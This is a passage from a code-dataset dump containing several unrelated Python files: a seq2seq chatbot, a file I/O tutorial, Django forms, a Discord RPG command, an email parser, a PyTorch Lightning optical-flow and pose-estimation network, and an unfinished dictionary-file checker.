indexs.append(index)\n \n # 종료 검사\n if index == self.END_INDEX or len(indexs) >= self.max_sequences:\n break\n\n # 목표 시퀀스를 바로 이전의 출력으로 설정\n target_seq = np.zeros((1, 1))\n target_seq[0, 0] = index\n \n # 디코더의 이전 상태를 다음 디코더 예측에 사용\n states = [state_h, state_c]\n\n # 인덱스를 문장으로 변환\n sentence = self.convert_index_to_text(indexs, self.index_to_word)\n to_matching = sentence.split(' ')\n to_matching = to_matching[:-1]\n chatbot_data = pd.read_csv('./seq2seq/ChatbotData_Cindy.csv', encoding='utf-8')\n try:\n for_matching = list(chatbot_data[chatbot_data.A.apply(lambda sentence1: all(word in sentence1 for word in to_matching))]['A'])\n return_sentence = for_matching[0]\n except IndexError:\n return_sentence = sentence\n return return_sentence\n \n\n def get_answer(self, text):\n input_seq = self.make_predict_input(text)\n return self.generate_text(input_seq)\n\n \n\n\n\n\n","sub_path":"Cindy_project/seq2seq/Seq2Seq_model_class.py","file_name":"Seq2Seq_model_class.py","file_ext":"py","file_size_in_byte":11262,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"87"}
+{"seq_id":"403456200","text":"#!/usr/bin/env python\n\"\"\"\n文件读、写,的步骤:\n 1.打开文件\n 2.读/写\n 3.关闭文件\nUTF-8编码:\n建议,文件在磁盘上保存时统一使用UTF-8编码\n在内存中,统一使用Unicode编码\n\"\"\"\nimport pickle\n\ndef 从文件中读数据():\n fp = open(\"names.txt\", \"rb\")\n #print(fp.read())\n content = fp.readlines()\n fp.seek(0)\n content2 = fp.readlines()\n print(content)\n print(content2)\n for i in content:\n print(i.decode(\"utf-8\").strip())\n fp.close()\n\n\ndef 把数据写入到文件():\n fp = open(\"地址.txt\", \"wb\")\n address = [\"中国\", \"非洲\", \"朝鲜\"]\n for i in address:\n #fp.write(i.encode(\"utf-8\")+ b'\\n')\n fp.write(\"{}\\n\".format(i).encode(\"utf-8\"))\n fp.close()\n\n\ndef write_pickle():\n dict1 = {\"name\": \"sam\", \"age\": 16}\n # fp = open(\"tmp_pickle\", 'wb')\n # pickle.dump(dict1, fp)\n # fp.close()\n\n # 优势:with上下文管理器,自动关闭已经打开的问题\n with open(\"tmp_pickle\", 'wb') as fp:\n pickle.dump(dict1, fp)\n\n\ndef read_pickle():\n fp = open(\"tmp_pickle\", 'rb')\n dict1 = pickle.load(fp)\n print(dict1)\n fp.close()\n\n\nif __name__ == \"__main__\":\n 从文件中读数据()\n #把数据写入到文件()\n #write_pickle()\n #read_pickle()","sub_path":"read_write_file.py","file_name":"read_write_file.py","file_ext":"py","file_size_in_byte":1296,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"87"}
+{"seq_id":"302956747","text":"from django import forms\nfrom django.forms.widgets import CheckboxInput\nfrom .models import Project, Task\n\n\nclass NewTaskForm(forms.ModelForm):\n # task_done = forms.BooleanField(required=False, widget= CheckboxInput)\n\n\n class Meta:\n model = Task\n fields = [\"task_title\", \"task_content\"]\n \n\n\n\nclass NewProjectForm(forms.ModelForm):\n # task_done = forms.BooleanField(required=False, widget= CheckboxInput)\n\n\n class Meta:\n model = Project\n fields = [\"project_title\"]\n class Media:\n js = ('ckeditor/ckeditor.js',) # The , at the end of this list IS important.\n css = {\n 'all': ('ckeditor/contents.css',)\n }\n","sub_path":"todo/forms.py","file_name":"forms.py","file_ext":"py","file_size_in_byte":681,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"87"}
+{"seq_id":"96065825","text":"from handler import BaseCommand, Context, Arguments, CommandResult\n\nfrom rpg.player import Player, UnknownPlayer\nfrom utils.formatting import codeblock\n\n\nclass Command(BaseCommand):\n async def run(self, ctx: Context, args: Arguments) -> CommandResult:\n try:\n player = await Player.from_id(ctx.author.id, ctx.bot.pg)\n except UnknownPlayer:\n return \"У вас нет персонажа\"\n\n if player.inventory.size:\n inventory = \"\\n\".join(str(i) for i in player.inventory)\n else:\n inventory = \"Ваш инвентарь пуст\"\n\n equipment_item_map = [\n (slot, getattr(player.equipment, slot))\n for slot in player.equipment._slots\n ]\n\n equipment = \"\\n\".join(\n f\"{slot:>10}: {item}\" for (slot, item) in equipment_item_map\n )\n\n return codeblock(\n f\"Экипировка:\\n\\n{equipment}\\n\\nИнвентарь:\\n\\n{inventory}\"\n )\n","sub_path":"tarakania_rpg/commands/rpg/inventory/command_inventory.py","file_name":"command_inventory.py","file_ext":"py","file_size_in_byte":986,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"87"}
+{"seq_id":"626775693","text":"import re\nimport requests\nfrom bs4 import BeautifulSoup\nfrom translate import Translate\n\nclass Email:\n def __init__(self, name, booking_no, errand, msg):\n self.sender = name\n self.booking_no = booking_no\n self.errand = errand\n self.msg = msg\n\nclass EmailParser:\n def __init__(self, max_length=0):\n self.MAX_MESSAGE_LENGTH = max_length\n\n def set_message_max_length(self, max_length):\n self.MAX_MESSAGE_LENGTH = max_length\n\n def parse_inbox(self, inbox, qty):\n emails = []\n count = 0\n invalid = 0\n while count < qty:\n try:\n count += 1\n item = next(inbox).body\n email = self.__parse_email(item)\n if email:\n emails.append(email)\n except Exception as e:\n invalid += 1\n print('EMAIL UNREADABLE', e)\n print('{} / {} emails parsed.'.format(qty - invalid, qty))\n return emails\n\n def __clean_html(self, html_object):\n if html_object is not None:\n return re.sub('<[^<]+?>', '', html_object)\n\n def __get_element(self, table, row):\n return str(table.findAll('table')[row].findAll('tr')[0])\n\n def __has_booking_no(self, table):\n return 'Ev bokningsnummer' in self.__get_element(table, 2)\n\n def __parse_email(self, html):\n soup = BeautifulSoup(html, 'html.parser')\n table = soup.findAll('table')[0]\n name = self.__get_element(table, 1)\n booking_no = self.__get_element(table, 3) if self.__has_booking_no(table) else '~None~'\n errand = self.__get_element(table, 5) if self.__has_booking_no(table) else self.__get_element(table, 3)\n msg = self.__get_element(table, 7) if self.__has_booking_no(table) else self.__get_element(table, 5)\n\n if len(str(msg)) <= self.MAX_MESSAGE_LENGTH or self.MAX_MESSAGE_LENGTH == 0:\n return Email(\n self.__clean_html(name)[1:][:-1],\n self.__clean_html(booking_no)[1:][:-1],\n self.__clean_html(errand)[1:][:-1],\n self.__clean_html(msg)[1:][:-1]\n )\n","sub_path":"src/email_parser.py","file_name":"email_parser.py","file_ext":"py","file_size_in_byte":2162,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"87"}
+{"seq_id":"586602652","text":"# STD\nimport os\nimport shutil\nfrom pathlib import Path\n\n# MISC\nimport numpy as np\nimport shutil\n\n# DL-framework\nimport torch\nimport torch.optim.lr_scheduler\nfrom pytorch_lightning.core.lightning import LightningModule\nfrom torchvision import transforms\nfrom torchvision.utils import make_grid\nfrom torch import from_numpy as fn\n\n# MODULES\n\nfrom src.common.utils import DotDict\nfrom raft import RAFT\nfrom src.common.visu import Visualizer\nfrom pose_estimation import full_pose_estimation\n\nfrom src.segmentation.fast_scnn import FastSCNN\nfrom src.common.rotations import so3_relative_angle\n\n\n__all__ = [\"Network\"]\n\n# exclude extremly large displacements\nMAX_FLOW = 400\nSUM_FREQ = 100\nVAL_FREQ = 5000\n# exclude extremly large displacements\nMAX_FLOW = 400\nSUM_FREQ = 100\nVAL_FREQ = 5000\n\n\ndef sequence_loss(flow_preds, flow_gt, valid, synthetic, gamma=0.8, max_flow=MAX_FLOW):\n \"\"\"Loss function defined over sequence of flow predictions\"\"\"\n\n n_predictions = len(flow_preds)\n flow_loss = 0.0\n\n # exlude invalid pixels and extremely large diplacements\n mag = torch.sum(flow_gt ** 2, dim=1).sqrt()\n valid = (valid >= 0.5) & (mag < max_flow)\n\n for i in range(n_predictions):\n i_weight = gamma ** (n_predictions - i - 1)\n i_loss = (flow_preds[i] - flow_gt).abs()\n flow_loss += i_weight * (valid[:, None] * i_loss).mean()\n\n epe = torch.sum((flow_preds[-1] - flow_gt) ** 2, dim=1).sqrt()\n epe2 = epe.clone()\n epe2 = epe2 * valid\n epe2 = epe2.sum(dim=(1, 2)) / valid.sum(dim=(1, 2))\n metrics = {}\n\n if synthetic.sum() > 0:\n metrics[\"epe_render\"] = epe2[synthetic].mean().item()\n non_synthetic = synthetic == False\n if non_synthetic.sum() > 0:\n metrics[\"epe_real\"] = epe2[non_synthetic].mean().item()\n\n epe = epe.view(-1)[valid.view(-1)]\n metrics[\"epe\"] = epe.mean().item()\n metrics[\"1px\"] = (epe < 1).float().mean().item()\n metrics[\"3px\"] = (epe < 3).float().mean().item()\n metrics[\"5px\"] = (epe < 5).float().mean().item()\n\n return flow_loss, metrics, epe2\n\n\nclass Network(LightningModule):\n def __init__(self, exp, env):\n super().__init__()\n self._exp = exp\n self._env = env\n self.hparams[\"lr\"] = self._exp[\"lr\"]\n\n self.model = RAFT(args=DotDict(self._exp[\"model\"][\"args\"]))\n\n self._mode = \"train\"\n self._logged_images = {\"train\": 0, \"val\": 0, \"test\": 0}\n\n if \"logged_images_max\" in self._exp.keys():\n self._logged_images_max = self._exp[\"logged_images_max\"]\n else:\n self._logged_images_max = {\"train\": 2, \"val\": 2, \"test\": 2}\n\n self._type = (\n torch.float16 if exp[\"trainer\"].get(\"precision\", 32) == 16 else torch.float32\n )\n self._visu = Visualizer(\n os.path.join(exp[\"name\"], \"visu\"), num_classes=2, store=False\n )\n\n if self._exp.get(\"mode\", \"train\") == \"test\":\n self._estimate_pose = True\n # SEGMENTATION\n self.seg = FastSCNN(**self._exp[\"seg\"][\"cfg\"])\n self.output_transform_seg = transforms.Compose(\n [\n transforms.Normalize([0.485, 0.456, 0.406], [0.229, 0.224, 0.225]),\n ]\n )\n else:\n self._estimate_pose = False\n\n self._count_real = {\"train\": 0, \"val\": 0, \"test\": 0}\n self._count_render = {\"train\": 0, \"val\": 0, \"test\": 0}\n\n shutil.rmtree(\"/home/jonfrey/tmp/ycb\", ignore_errors=True)\n\n def forward(self, batch, **kwargs):\n image1 = batch[0]\n image2 = batch[1]\n flow_predictions = self.model(image1, image2, iters=self._exp[\"model\"][\"iters\"])\n\n self.plot(batch[2], flow_predictions, image1, image2, batch[3])\n return flow_predictions\n\n def on_train_epoch_start(self):\n\n self._visu.logger = self.logger\n self._mode = \"train\"\n\n def on_train_start(self):\n pass\n\n def on_epoch_start(self):\n # RESET IMAGE COUNT\n for k in self._logged_images.keys():\n self._logged_images[k] = 0\n self._visu.epoch = self.trainer.current_epoch\n self.log(\"current_epoch\", self.trainer.current_epoch)\n self.log(\"gloabal_step\", self.trainer.global_step)\n\n def training_step(self, batch, batch_idx):\n \"\"\"\n img1 0-255 BS,C,H,W\n img2 0-255 BS,C,H,W\n flow BS,2,H,W max [-155 263]\n valid 0 or 1\n\n flow_predictons is a list len(flow_predictions) = iters , flow_predictions[0].shape == flow.shape\n \"\"\"\n self.log(\n \"learning_rate\", float(self.trainer.lr_schedulers[0][\"scheduler\"].get_lr()[0])\n )\n BS = batch[0].shape[0]\n flow = batch[2]\n valid = batch[3]\n synthetic = batch[4]\n flow_predictions = self(batch=batch)\n\n loss, metrics, epe_per_object = sequence_loss(\n flow_predictions, flow, valid, synthetic, self._exp[\"model\"][\"gamma\"]\n )\n\n if self._estimate_pose:\n # PRED FLOW\n inp = torch.cat(\n [\n self.output_transform_seg(batch[0] / 255.0),\n self.output_transform_seg(batch[1] / 255.0),\n ],\n dim=1,\n )\n outputs = self.seg(inp)\n probs = torch.nn.functional.softmax(outputs[0], dim=1)\n pred_valid = torch.argmax(probs, dim=1)\n acc = (pred_valid == valid).sum() / torch.numel(valid)\n (\n h_gt,\n h_render,\n h_init,\n bb,\n idx,\n K_ren,\n K_real,\n render_d,\n model_points,\n img_real_ori,\n p,\n ) = batch[5:]\n\n # ESTIMATE POSE\n (\n res_dict,\n count_invalid,\n h_pred__pred_pred,\n ratios,\n valid_res,\n ) = full_pose_estimation(\n h_gt=h_gt.clone(),\n h_render=h_render.clone(),\n h_init=h_init.clone(),\n bb=bb,\n flow_valid=pred_valid.clone(),\n flow_pred=flow_predictions[-1].clone(),\n idx=idx.clone(),\n K_ren=K_ren,\n K_real=K_real,\n render_d=render_d.clone(),\n model_points=model_points.clone(),\n cfg=self._exp[\"eval_cfg\"].get(\"full_pose_estimation\", {}),\n )\n try:\n self.count_suc += BS - count_invalid\n self.count_failed += count_invalid\n except:\n self.count_suc = BS - count_invalid\n self.count_failed = count_invalid\n\n self.log(f\"acc_mask\", acc.item(), on_step=True, on_epoch=True)\n\n index_key = str(int(idx))\n self.log(\n f\"inital_trans_error_obj\" + index_key,\n (torch.norm(h_gt[0, :3, 3] - h_init[0, :3, 3])).item(),\n on_step=True,\n on_epoch=True,\n )\n self.log(\n f\"inital_rotation_error_obj\" + index_key,\n (\n so3_relative_angle(\n h_gt[:, :3, :3].type(torch.float32), h_init[:, :3, :3].type(torch.float32)\n )\n / np.math.pi\n * 180\n ).item(),\n on_step=True,\n on_epoch=True,\n )\n\n self.log(\n f\"inital_trans_error\",\n torch.norm(h_gt[0, :3, 3] - h_init[0, :3, 3]).item(),\n on_step=True,\n on_epoch=True,\n )\n self.log(\n f\"inital_rotation_error\",\n (\n so3_relative_angle(\n h_gt[:, :3, :3].type(torch.float32), h_init[:, :3, :3].type(torch.float32)\n )\n / np.math.pi\n * 180\n ).item(),\n on_step=True,\n on_epoch=True,\n )\n\n if len(res_dict) > 0:\n self.log(f\"ransac_inlier_ratio\", float(ratios[0]), on_step=False, on_epoch=True)\n # STORE PREDICTIONS\n tmp = os.path.join(\n self._exp[\"name\"], p[0][p[0].find(\"ycb\") :], str(int(idx[0]) + 1) + \".npy\"\n )\n tmp2 = os.path.join(\n \"/home/jonfrey/tmp\", p[0][p[0].find(\"ycb\") :], str(int(idx[0]) + 1) + \".npy\"\n )\n Path(tmp).parent.mkdir(parents=True, exist_ok=True)\n np.save(str(tmp), h_pred__pred_pred[0].cpu().numpy())\n Path(tmp2).parent.mkdir(parents=True, exist_ok=True)\n np.save(str(tmp2), h_pred__pred_pred[0].cpu().numpy())\n\n index_key = str(int(idx))\n self.log(f\"acc_mask_obj\" + index_key, acc.item(), on_step=True, on_epoch=True)\n\n self.log(\n f\"adds_init_obj\" + index_key,\n res_dict[\"adds_h_init\"].cpu().item(),\n on_step=True,\n on_epoch=True,\n )\n self.log(\n f\"add_s_init_obj\" + index_key,\n res_dict[\"add_s_h_init\"].cpu().item(),\n on_step=True,\n on_epoch=True,\n )\n\n self.log(\n f\"adds_obj\" + index_key,\n res_dict[\"adds_h_pred\"].cpu().item(),\n on_step=True,\n on_epoch=True,\n )\n self.log(\n f\"add_s_obj\" + index_key,\n res_dict[\"add_s_h_pred\"].cpu().item(),\n on_step=True,\n on_epoch=True,\n )\n self.plot_pose(\n model_points=model_points,\n h_gt=h_gt,\n h_init=h_init,\n h_pred=h_pred__pred_pred,\n pred_valid=pred_valid,\n img_real_zoom=batch[0],\n img_real_ori=img_real_ori,\n K_real=K_real,\n index=batch_idx,\n )\n else:\n print(\"Count SUC\", self.count_suc, \" Count FAILED\", self.count_failed)\n # print(\"Force PLOT since Pose Estimation vailed!\")\n # self.plot( batch[2], flow_predictions, batch[0], batch[1], pred_valid, force =True, index = batch_idx)\n # self.plot_seg ( batch[0], batch[1], pred_valid, valid,force = True, index = batch_idx )\n\n if batch_idx % 50 == 0:\n self.log(f\"count_suc\", self.count_suc, on_step=True, on_epoch=False)\n self.log(f\"count_failed\", self.count_failed, on_step=True, on_epoch=False)\n\n for k in res_dict.keys():\n # print( \"k \", k, \" res_dict \", res_dict[k] ,\" value \", res_dict[k].mean())\n self.log(\n f\"{self._mode}_{k}_pred_flow_pred_seg\",\n res_dict[k].mean().item(),\n on_step=True,\n on_epoch=False,\n prog_bar=False,\n )\n\n if False:\n # GT FLOW GT SEG\n res_dict, count_invalid, h_pred__gt_gt = full_pose_estimation(\n h_gt=h_gt.clone(),\n h_render=h_render.clone(),\n h_init=h_init.clone(),\n bb=bb,\n flow_valid=valid.clone(),\n flow_pred=flow.clone(),\n idx=idx.clone(),\n K_ren=K_ren,\n K_real=K_real,\n render_d=render_d.clone(),\n model_points=model_points.clone(),\n cfg=self._exp[\"eval_cfg\"].get(\"full_pose_estimation\", {}),\n )\n for k in res_dict.keys():\n self.log(\n f\"{self._mode}_{k}_gt_flow_gt_seg\",\n res_dict[k].mean(),\n on_step=True,\n on_epoch=True,\n prog_bar=True,\n )\n\n # PRED FLOW GT SEG\n (\n h_gt,\n h_render,\n h_init,\n bb,\n idx,\n K_ren,\n K_real,\n render_d,\n model_points,\n img_real_ori,\n p,\n ) = batch[5:]\n res_dict, count_invalid, h_pred__pred_gt = full_pose_estimation(\n h_gt=h_gt.clone(),\n h_render=h_render.clone(),\n h_init=h_init.clone(),\n bb=bb,\n flow_valid=valid.clone(),\n flow_pred=flow_predictions[-1].clone(),\n idx=idx.clone(),\n K_ren=K_ren,\n K_real=K_real,\n render_d=render_d.clone(),\n model_points=model_points.clone(),\n cfg=self._exp[\"eval_cfg\"].get(\"full_pose_estimation\", {}),\n )\n for k in res_dict.keys():\n self.log(\n f\"{self._mode}_{k}_pred_flow_gt_seg\",\n res_dict[k].mean(),\n on_step=True,\n on_epoch=True,\n prog_bar=False,\n )\n\n else:\n idx = batch[5]\n bb = batch[6] # list containing tensors for [real_tl ,real_br, ren_tl, ren_br ]\n\n logging_metrices = [\"epe\", \"epe_real\", \"epe_render\"]\n for met in logging_metrices:\n if met in metrics:\n self.log(\n f\"{self._mode}_{met}\",\n metrics[met],\n on_step=True,\n on_epoch=True,\n prog_bar=True,\n )\n\n if self._exp.get(\"log\", {}).get(\"individual_obj\", {}).get(self._mode, False):\n for i in range(BS):\n obj = str(int(idx[i]))\n # real_tl ,real_br, ren_tl, ren_br\n tl = bb[0][i]\n br = bb[1][i]\n\n _w = br[1] - tl[1]\n _h = br[0] - tl[0]\n\n # r1 and r2 should be equal up to discretization errors\n r1 = 480 / _h\n r2 = 640 / _w\n r = (r1 + r2) / 2\n if synthetic[i]:\n self.log(\n f\"{self._mode}_render_norm_obj{obj}\",\n epe_per_object[i].float().item() / r,\n on_step=False,\n on_epoch=True,\n prog_bar=False,\n )\n self.log(\n f\"{self._mode}_render_obj{obj}\",\n epe_per_object[i].float().item(),\n on_step=False,\n on_epoch=True,\n prog_bar=False,\n )\n else:\n self.log(\n f\"{self._mode}_real_norm_obj{obj}\",\n epe_per_object[i].float().item() / r,\n on_step=False,\n on_epoch=True,\n prog_bar=False,\n )\n self.log(\n f\"{self._mode}_real_obj{obj}\",\n epe_per_object[i].float().item(),\n on_step=False,\n on_epoch=True,\n prog_bar=False,\n )\n\n self._count_real[self._mode] += (synthetic == False).sum()\n self._count_render[self._mode] += (synthetic).sum()\n\n self.log(\n f\"{self._mode}_count_real\",\n self._count_real[self._mode],\n on_step=False,\n on_epoch=True,\n prog_bar=False,\n )\n self.log(\n f\"{self._mode}_count_render\",\n self._count_render[self._mode],\n on_step=False,\n on_epoch=True,\n prog_bar=False,\n )\n\n return {\"loss\": loss, \"pred\": flow_predictions, \"target\": flow}\n\n def plot_pose(\n self,\n model_points,\n h_gt,\n h_init,\n h_pred,\n pred_valid,\n img_real_zoom,\n img_real_ori,\n K_real,\n index=0,\n ):\n if self._logged_images[self._mode] < self._logged_images_max[self._mode]:\n b = 0\n img_gt = self._visu.plot_estimated_pose(\n img=img_real_ori[b].cpu().numpy(),\n points=model_points[b].cpu(),\n H=h_gt[b].cpu(),\n K=K_real[b].cpu(),\n tag=\"Test_gt\",\n epoch=index,\n not_log=True,\n store=False,\n )\n img_pred = self._visu.plot_estimated_pose(\n img=img_real_ori[b].cpu().numpy(),\n points=model_points[b].cpu(),\n H=h_pred[b].cpu(),\n K=K_real[b].cpu(),\n tag=\"Test_pred\",\n epoch=index,\n not_log=True,\n store=False,\n )\n img_init = self._visu.plot_estimated_pose(\n img=img_real_ori[b].cpu().numpy(),\n points=model_points[b].cpu(),\n H=h_init[b].cpu(),\n K=K_real[b].cpu(),\n tag=\"Test_init\",\n not_log=True,\n store=False,\n )\n\n ass = np.concatenate([img_init, img_pred, img_gt], axis=1)\n print(ass.shape)\n self._visu.plot_image(img=ass, tag=\"Pose_INIT_PRED_GT\", epoch=index, store=False)\n\n def plot(self, flow_gt, flow_pred, img1, img2, valid, force=False):\n if self._logged_images[self._mode] < self._logged_images_max[self._mode] or force:\n\n for flow, name in zip([flow_gt, flow_pred[-1]], [\"gt\", \"pred\"]):\n corros = []\n for b in range(img1.shape[0]):\n\n i1 = img1[b].permute(1, 2, 0)\n i2 = img2[b].permute(1, 2, 0)\n va = valid[b]\n fl = flow[b].permute(1, 2, 0)\n corros.append(\n fn(\n self._visu.plot_corrospondence(\n fl[:, :, 0],\n fl[:, :, 1],\n va,\n i1,\n i2,\n colorful=True,\n text=False,\n res_h=30,\n res_w=30,\n min_points=50,\n jupyter=False,\n not_log=True,\n )\n )\n )\n\n res = torch.stack(corros).permute(0, 3, 1, 2)\n img = make_grid(res, nrow=2, padding=5)\n idx = self._logged_images[self._mode]\n\n nr = self._logged_images[self._mode] + self.trainer.current_epoch * (\n self._logged_images_max[self._mode] + 1\n )\n self._visu.plot_image(\n img=img, tag=f\"Flow_{self._mode}_{name}\", epoch=nr, store=False\n )\n self._logged_images[self._mode] += 1\n\n def plot_seg(\n self, ori_real, ori_render, pred, target, force=False, idx=None, index=0\n ):\n if self._logged_images[self._mode] < self._logged_images_max[self._mode] or force:\n BS = pred.shape[0]\n rows = int(BS ** 0.5)\n grid_target = make_grid(\n target[:, None].repeat(1, 3, 1, 1),\n nrow=rows,\n padding=2,\n scale_each=False,\n pad_value=2,\n )\n grid_pred = make_grid(\n pred[:, None].repeat(1, 3, 1, 1),\n nrow=rows,\n padding=2,\n scale_each=False,\n pad_value=2,\n )\n\n grid_ori_real = make_grid(\n ori_real, nrow=rows, padding=2, scale_each=False, pad_value=0\n )\n grid_ori_render = make_grid(\n ori_render, nrow=rows, padding=2, scale_each=False, pad_value=0\n )\n\n self._visu.plot_detectron(\n img=grid_ori_real,\n label=grid_pred[0, :, :],\n tag=\"PRED SEG\",\n method=\"left\",\n store=False,\n )\n self._visu.plot_image(\n img=grid_ori_render,\n tag=\"Segmentation_left_pred__right_render_img\",\n method=\"right\",\n epoch=index,\n store=False,\n )\n\n self._visu.plot_detectron(\n img=grid_ori_real,\n label=grid_pred[0, :, :],\n tag=\"PRED SEG\",\n method=\"left\",\n store=False,\n )\n self._visu.plot_detectron(\n img=grid_ori_real,\n label=grid_target[0, :, :],\n tag=\"Segmentation_left_pred__right_gt\",\n method=\"right\",\n epoch=index,\n store=False,\n )\n\n def training_step_end(self, outputs):\n # Log replay buffer stats\n self.log(\"train_loss\", outputs[\"loss\"], on_step=False, on_epoch=True, prog_bar=True)\n return {\"loss\": outputs[\"loss\"]}\n\n def validation_step(self, batch, batch_idx, dataloader_idx=0):\n return self.training_step(batch, batch_idx)\n\n def validation_step_end(self, outputs):\n self.log(\"val_loss\", outputs[\"loss\"], on_step=False, on_epoch=True, prog_bar=True)\n\n def on_validation_epoch_start(self):\n self._mode = \"val\"\n\n def validation_epoch_end(self, outputs):\n pass\n\n def configure_optimizers(self):\n if self._exp[\"optimizer\"][\"name\"] == \"ADAM\":\n optimizer = torch.optim.Adam(\n [{\"params\": self.model.parameters()}], lr=self.hparams[\"lr\"]\n )\n elif self._exp[\"optimizer\"][\"name\"] == \"SGD\":\n optimizer = torch.optim.SGD(\n [{\"params\": self.model.parameters()}],\n lr=self.hparams[\"lr\"],\n **self._exp[\"optimizer\"][\"sgd_cfg\"],\n )\n elif self._exp[\"optimizer\"][\"name\"] == \"WADAM\":\n optimizer = torch.optim.AdamW(\n self.model.parameters(),\n lr=self.hparams[\"lr\"],\n **self._exp[\"optimizer\"][\"wadam_cfg\"],\n )\n\n else:\n raise Exception(\"Optimizer name not defined\")\n\n if self._exp.get(\"lr_scheduler\", {}).get(\"active\", False):\n if self._exp[\"lr_scheduler\"][\"name\"] == \"POLY\":\n # polynomial lr-scheduler\n init_lr = self.hparams[\"lr\"]\n max_epochs = self._exp[\"lr_scheduler\"][\"poly_cfg\"][\"max_epochs\"]\n target_lr = self._exp[\"lr_scheduler\"][\"poly_cfg\"][\"target_lr\"]\n power = self._exp[\"lr_scheduler\"][\"poly_cfg\"][\"power\"]\n lambda_lr = (\n lambda epoch: (\n ((max_epochs - min(max_epochs, epoch)) / max_epochs) ** (power)\n )\n + (1 - (((max_epochs - min(max_epochs, epoch)) / max_epochs) ** (power)))\n * target_lr\n / init_lr\n )\n scheduler = torch.optim.lr_scheduler.LambdaLR(\n optimizer, lambda_lr, last_epoch=-1, verbose=True\n )\n elif self._exp[\"lr_scheduler\"][\"name\"] == \"OneCycleLR\":\n num_steps = self._exp[\"lr_scheduler\"][\"onecyclelr_cfg\"][\"num_steps\"]\n\n scheduler = torch.optim.lr_scheduler.OneCycleLR(\n optimizer,\n max_lr=self.hparams[\"lr\"],\n total_steps=num_steps + 100,\n pct_start=self._exp[\"lr_scheduler\"][\"onecyclelr_cfg\"].get(\"pct_start\", 0.05),\n cycle_momentum=False,\n anneal_strategy=\"linear\",\n )\n\n lr_scheduler = {\"scheduler\": scheduler, \"interval\": \"step\"}\n\n ret = {\"optimizer\": optimizer, \"lr_scheduler\": lr_scheduler}\n else:\n ret = [optimizer]\n return ret\n","sub_path":"src/flow/lightning/network.py","file_name":"network.py","file_ext":"py","file_size_in_byte":20379,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"87"}
+{"seq_id":"216186160","text":"#!/usr/bin/env python\r\n# coding=utf-8\r\n\r\n\"\"\"\r\nCheck A0000001.txt.\r\n\"\"\"\r\n\r\nimport os\r\nimport sys\r\nimport re\r\nimport codecs\r\n\r\nimport CheckLog\r\nlog = CheckLog.get_file_log(r'checkA.log')\r\n\r\nclass DicItemA:\r\n\tdef __init__(self, s):\r\n\t\ts = s.strip()\r\n\t\tself._linestr = s\r\n\t\tpat = re.match( \\\r\n\t\t\t\tr'^(\\S+)\\t([\\w ]+)\\t(0x[\\dA-F]{4})\\t(0x[\\dA-F]{4})\\t(0x[\\dA-F]{8})$', \\\r\n\t\t\t\tself._linestr)\r\n\t\tif not pat:\r\n\t\t\tlog.warning(r' : %s : %s', self.get_father()['nextLevelId'], self.get_str())\r\n\t\t\treturn\r\n\t\tself._name = pat.group(1)\r\n\t\tself._pinyin = pat.group(2)\r\n\t\tself._minKiwiId = pat.group(3)\r\n\t\tself._maxKiwiId = pat.group(4)\r\n\t\tself._num0 = pat.group(5)\r\n\t\t\r\n\tdef get_str(self):\r\n\t\treturn self._linestr\r\n\t\r\n\tdef __getitem__(self, attr):\r\n\t\tif attr == 'name':\r\n\t\t\treturn self._name\r\n\t\telif attr == 'pinyin':\r\n\t\t\treturn self._pinyin\r\n\t\telif attr == 'minKiwiId':\r\n\t\t\treturn self._minKiwiId\r\n\t\telif attr == 'maxKiwiId':\r\n\t\t\treturn self._maxKiwiId\r\n\t\telif attr == 'num0':\r\n\t\t\treturn self._num0\r\n\t\telse:\r\n\t\t\traise KeyError()\r\n\t\t\r\n\tdef check(self):\r\n\t\t\"\"\" Check the item itself only.\r\n\t\t\"\"\"\r\n\t\tchecker = DicItemAChecker(self)\r\n\t\tr = checker.check()\r\n\t\tif not r:\r\n\t\t\tlog.warning(r' : %s', self.get_str())\r\n\t\treturn r\r\n\t\r\nclass DicItemAChecker():\r\n\tpinyinChars = set(u'abcdefghijklmnopqrstuvwxyz /1234')\r\n\t\r\n\tdef __init__(self, item):\r\n\t\tself._item = item\r\n\t\t\r\n\tdef check(self):\r\n\t\tr1 = self._check_1()\r\n\t\tr2 = self._check_2()\r\n\t\treturn r1 and r2\r\n\t\r\n\tdef _check_1(self):\r\n\t\t\"\"\"Check encoding, which is checked in function check().\r\n\t\t\"\"\"\r\n\t\treturn True\r\n\t\r\n\tdef _check_2(self):\r\n\t\t\"\"\"Check pinyin.\r\n\t\t\"\"\"\r\n\t\td = self._dicItem\r\n\t\tr1 = self._check_2_1()\r\n\t\tr2 = self._check_2_2();\r\n\t\tif not r1:\r\n\t\t\tlog.info(r' Alphabet text but not NoPinYin : %s', self._dicItem.get_str())\r\n\t\t\treturn False\r\n\t\tif not r2:\r\n\t\t\tlog.info(r' Pinyin contains other characters : %s', self._dicItem.get_str())\r\n\t\t\treturn False\r\n\t\treturn True\r\n\t\r\n\tdef _check_2_1(self):\r\n\t\t\"\"\"Check if text has alphabet, then pinyin should be \"NoPinYin\".\r\n\t\t\"\"\"\r\n\t\tdef has_alphabet(s):\r\n\t\t\tfor c in s:\r\n\t\t\t\tif c in self.alphabets:\r\n\t\t\t\t\treturn True\r\n\t\t\treturn False\r\n\t\tif has_alphabet(self._dicItem['name']):\r\n\t\t\tif self._dicItem['pinyin'] != u'NoPinYin':\r\n\t\t\t\treturn False\r\n\t\treturn True\r\n\t\r\n\tdef _check_2_2(self):\r\n\t\t\"\"\"Check characters in pinyin.\r\n\t\t\"\"\"\r\n\t\tpinyin = self._dicItem['pinyin']\r\n\t\tif pinyin == 'NoPinYin':\r\n\t\t\treturn True\r\n\t\tfor c in pinyin:\r\n\t\t\tif not c in self.pinyinChars:\r\n\t\t\t\treturn False\r\n\t\treturn True\r\n\t\r\ndef check(filename):\r\n\t\"\"\"Check records in file.\r\n\t\"\"\"\r\n\tf = codecs.open(filename, 'r', 'gbk')\r\n\ttry:\r\n\t\tls = f.readlines()\r\n\texcept:\r\n\t\tlog.info(r' Contain non-GBK character : %s', self._dicItem.get_str())\r\n\t\treturn False\r\n\trds = tuple(DicItemA(line) for line in ls)\r\n\tr = tuple(r.check() for r in rds)\r\n\treturn all(r)\r\n\r\ndef 